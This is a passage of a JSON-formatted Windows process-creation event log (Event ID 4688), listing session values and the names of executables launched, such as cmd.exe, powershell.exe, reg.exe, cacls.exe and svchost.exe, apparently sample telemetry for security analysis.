",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"Exe\":[\"svchost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"dllhost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"MonitoringHost.exe\",\"unlodctr.exe\",\"conhost.exe\",\"csc.exe\",\"conhost.exe\",\"cvtres.exe\",\"lodctr.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WerFault.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"cscript.exe\",\"conhost.exe\",\"cscript.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"MOFWriter.exe\",\"conhost.exe\",\"ASMHost.exe\",\"conhost.exe\",\"SecEdit.exe\",\"SecEdit.exe\",\"DscRun.exe\",\"conhost.exe\",\"Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"MOMPerfSnapshotHelper.exe\",\"MOMPerfSnapshotHelper.exe\",\"MOMPerfSnapshotHelper.exe\",\"WmiPrvSE.exe\",\"MOMPerfSnapshotHelper.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"InstallAgent.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"InstallAgent.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"CollectGuestLogs.exe\",\"cmd.exe\",\"conhost.exe\",\"svchost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"suchost.exe\",\"powershell.exe\",\"powershell.exe\",\"cmd.exe\",\"GoogleUpdate.exe\",\"SpeechModelDownload.exe\",\"wsqmcons.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"appidcertstorecheck.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"AppHostRegistrationVerifier.exe\",\"UsoClient.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"DeviceCensus.exe\",\"conhost.exe\",\"DeviceCensus.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"CompatTelRunner.exe\",\"conhost.exe\",\"MpCmdRun.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"wsqmcons.exe\",\"wermgr.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"appidcertstorecheck.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"wermgr.exe\",\"wsqmcons.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"wermgr.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"wermgr.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"taskhostw.exe\",\"GoogleUpdate.exe\",\"UsoClient.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"wermgr.exe\",\"wermgr.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"services.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"WmiApSrv.exe\",\"WmiApSrv.exe\",\"WmiApSrv.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"svchost.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"MonitoringHost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"WaAppAgent.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\